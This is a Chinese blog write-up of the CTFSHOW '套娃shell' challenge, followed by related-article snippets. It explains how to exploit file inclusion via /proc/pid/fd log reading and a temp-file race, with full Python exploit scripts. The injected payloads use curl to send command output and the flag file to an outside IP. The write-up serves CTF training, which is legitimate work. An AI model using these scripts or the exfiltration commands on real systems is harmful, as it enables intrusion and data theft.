CTFSHOW 套娃shell

最新推荐文章于 2024-05-02 22:30:28 发布
最新推荐文章于 2024-05-02 22:30:28 发布
阅读量2.3k 收藏
点赞数
文章标签: ctf php python java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/miuzzx/article/details/124489107
版权

CTFSHOW 套娃shell

1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了):

GET /?file=/a HTTP/1.1
Host: 127.0.0.1
Connection: close

但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。
题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/
我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也是可以的。
思来想去只能是构造一个临时文件,或者可以日志可控。
2、根据返回的请求包可以看到题目环境是php7.3.2+nginx,所以日志一般位置为/var/log/nginx/access.log。很不幸文件名存在点号。
3、如果单纯的上传文件然后留下/tmp/phpxxxxxx形式的文件的话,爆破的可能性微乎其微,况且文件不是永久存在的。
4、最后对于我来说可以考虑的就只剩文件描述符了。/proc/pid/fd/xxx可能存在web日志。而pid我们通过传一个不带参数的get请求就可以得到。

在这里插入图片描述
比如我这个是125。
经过测试循环跑上一段时间就可以读到日志

import socket
import re
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',28099))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
while True:
	for i in range(0,256):
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',28099))
		file=f"/proc/{pid}/fd/{i}"

		s.send(f'''GET /?file={file} HTTP/1.1
Host:127.0.0.1
User-Agent: yu22x
Connection: close

			'''.encode())
		data=s.recv(1024)
		s.close()
		if "yu22x" in data.decode():
			print(i,'\n',data.decode())
			exit(0)

可以看到可以读取到日志
在这里插入图片描述
并且有内容是可控的,那么我们第一次访问的时候带上shell在请求头里面。

import socket
import re
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',28197))
s.send(f'''GET /curl http://vps:4567?s=`ls` HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)
while True:
	for i in range(0,256):
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',28197))
		file=f"/proc/{pid}/fd/{i}"

		s.send(f'''GET /?file={file} HTTP/1.1
Host:127.0.0.1
User-Agent: yu22x
Connection: close

			'''.encode())
		data=s.recv(1024)
		s.close()
		if "yu22x" in data.decode():
			print(i,'\n',data.decode())
			exit(0)

日志里面也确实出现了,并且没有因为请求头第一行的空格而请求失败。
在这里插入图片描述

本地测试shell_exec是可以执行上面报错的内容的(分号不会影响后面的命令,并且井号注释了后面的多余内容),但是不知道为啥靶机执行失败了。
在这里插入图片描述

5、所以不得已考虑其他方式,前几天虎符线上赛有个题也是用到了fd。当时参考的文章是https://tttang.com/archive/1384/
大概意思就是如果post传一段很大的数据,首先生成临时文件,然后请求结束后被删除。不过该文件其实还会存在于/proc/pid/fd/xxx下,而后面的xxx范围很小,可以爆破出来的。pid们上面已经可以得到了。

思路基本上就理清了,一边post传数据,一边遍历fd下的文件。

这里就不细究后端怎么对请求包处理的了。

exp

import  threading, requests
import socket
import re
port= 28053
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',port))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)

con="curl http://101.34.94.44:4567?`cat /f*`;"+'0'*1024*500
l = len(con)
def upload():
	while True:
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',port))
		x=f'''POST / HTTP/1.1
Host: 127.0.0.1
Content-Length: {l}
Content-Type: application/x-www-form-urlencoded
Connection: close

{con}

		'''.encode()
		s.send(x)
		s.close()

def bruter():
	while True:
		for fd in range(3,40):
			print(fd)
			s=socket.socket()
			s.connect(('pwn.challenge.ctf.show',port))
			s.send(f'''GET /?file=/proc/{pid}/fd/{fd} HTTP/1.1
Host: 127.0.0.1
Connection: close

'''.encode())
			print(s.recv(2048).decode())
			s.close()


for i in range(30):
    t = threading.Thread(target=upload)
    t.start()
for j in range(30):
    a = threading.Thread(target=bruter)
    a.start()
yu22x
关注
nc: getnameinfo: Temporary failure in name resolution问题处理
SHELLCODE_8BIT的博客
06-20 3449
我们查看nc命令,得知nc -lvp为监听,输出详细信息verbose,p监听端口,而我们使用下面方式取代。 使用下列命令代替,增加n参数,不对ip:port解析。
俄罗斯套娃
04-17
在信息技术领域,“俄罗斯套娃”这一概念被创造性地运用于数据处理和存储方式中。这一比喻源自于经典的俄罗斯套娃玩具,其由一系列大小不同的木制娃娃组成,每个娃娃都能嵌套在另一个更大的娃娃之中。将这种嵌套的...
ctfshow 36d
blowed的博客
03-18 1864
36D练手赛不知所措easy shell36D杯给你shellWUSTCTF朴实无华RevengeALL_INFO_U_WANT你取吧 36D练手赛 不知所措 $file 暗示参数为file 且url必须含有test ?file=php://filter/convert.base64-encode/resource=test/../index. ​ 解码得到源代码 <?php error_reporting(0); $file=$_GET['file']; $file=$file.'ph.
ctfshow 36D练手赛 web writeup
ashMOB的博客
10-30 1307
ctfshow 36D练手赛 web writeup 不知所措.jpg 对萌新友好 一进入就看到提示 php $file must has test 提示传参中需要包含test ?file=test试试 回显中少了$file must has test字样,且变成了testphp,尝试访问test.php 回显为flag_not_here 说明存在此文件,返回主页尝试传参?file=test. 回显为 test.php flag_not_here 猜测为文件包含,尝试包含主页源码 传参?file=php:/
BUUCTF--[MRCTF2020]套娃
二狗的博客
03-27 248
打开靶机:查看源码发现第一个if判断传参的字符串,不能有_和%5f绕过:PHP会将传参中的空格( )、小数点(.)自动替换成下划线第二个if判断get传参b_u_p_t不等于23333 并且开头和结尾和中间必须是23333绕过:在23333结尾加个换行符url编码为%0a 即可绕过,发现进入得查看原码发现解码得随便用POST方法给Merak一个值发现代码1、来源ip是127.0.0.1 用2、get参数2333传来的值,使用文件流打开后内容为。
2020新春战疫ctf公益赛——Misc套娃
weixin_43491669的博客
03-03 4050
一看套娃就能猜到会是一个繁琐的题目,从压缩包里放着压缩包可以猜测整个题目的过程中寻找压缩包密码是一条主线。 **第一层** 很明显的txt里边Ook的加密,解密便得到压缩包2的密码。 brainfuck/Ook解密 但是还给了一张图片,按着处理图片的步骤看属性,winhex打开。。。略,个人比较喜欢一个叫Hxd的工具,跟winhex功能是差不多的,打开图片后发现最末尾出现了part1一串字符,...
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
俄罗斯套娃程序及设计
06-09
【俄罗斯套娃程序及设计】是一种特殊的算法应用,主要用于寻找最佳路径或解决方案。在这个特定的实现中,程序设计用于处理二维矩阵数据,可能是为了解决寻路问题或者优化问题。以下是这个算法的关键点: 1. **递归...
中兴设计大赛 套娃问题动态算法
06-11
本主题聚焦于“中兴设计大赛”的一个特定挑战,即“套娃问题”,这是一个与俄罗斯套娃概念相结合的算法问题。在这个比赛中,参赛者需要设计一个支持“多0”的动态规划解决方案来处理套娃的嵌套关系。 俄罗斯套娃,...
ctf MISC 简单套娃
god_001的博客
03-27 1325
题目给了一个图片 用010editor分析,发现两个 FF D8(JPG图像起始位置),复制第二段开始的数据另存为JPG图像 将得到的两个图象使用Stegsolve里的"Image Combiner"模式(图片拼接),在SUB(R,G,B)模式下得到flag 对于Stegsolve的使用: 其有 File Format、Data Extract、Steregram Solve、Frame Browser、Image Combiner五种功能 File Format文件格式功能下,可查看图片的
合天网安 CTF之第六周-套娃一样的上传
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-10 482
本实验无writeup,需要同学们发挥自己所学,一步一步寻找线索,寻找细节信息,最终拿下目标flag。
ctf (套娃)
Glacier_Mount的博客
07-21 5742
键盘流量
ctfshow 36D练手赛 超超超级详解 ==
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
09-30 1611
1、不知所措.jpg 这题对我这个新手来说真的是一言难尽…太吃经验了,老手肯定是分分钟解决 打开页面,这里的意思是变量$file必须要有test 首先猜测变量$file是通过$_GET['file']GET请求得到的且为?file=test ??自动给我加了一个php 难道是存在一个test.php文件?尝试,输入test自动补php,index.php?file=test.php,这是一个文件包含? 也确实存在,貌似是文件包含,但是它说flag不在这儿 既然是文件包含,尝试用php:
ctfer的web日常:给你shellctfshow)
Hunter1_1的博客
03-21 720
因为数字与0xC0为0;所有可以得知$flag_md5前3位为数字;故secret = 115满足$obj['secret']!查看源码,发现“/?发现好多东西都被禁了;
ctfshow-36D练手赛
最新发布
2202_75812594的博客
05-02 563
首先根据提示 传入: 猜测文件包含,传入: 解码的得: playload: easyshell: 通过burp抓包 发现flflflflag.php,得到 没有利用的漏斗页面,所以利用session文件包含(条件竞争)获取getshell。 脚本如下: 最后通过 即获取flag
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2670
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
CTF2020]套娃 1
weixin_46196627的博客
02-04 296
file_get_contents() 函数把整个文件读入一个字符串中。绕过preg_match 使用%0a换行符占位 23333%0a。php在解析变量名的时候会把+,%20,*,{,[解析为_使用data://text/plain;fuckjs代码,在console运行 得到提示。代码中用单引号和===强比较 字符串。利用php字符串解析特性bypass。使用Cilent-ip为请求ip。
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套娃shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套娃shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套娃shell来执行命令并获取所需的结果了。请注意,使用套娃shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.youkuaiyun.com/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值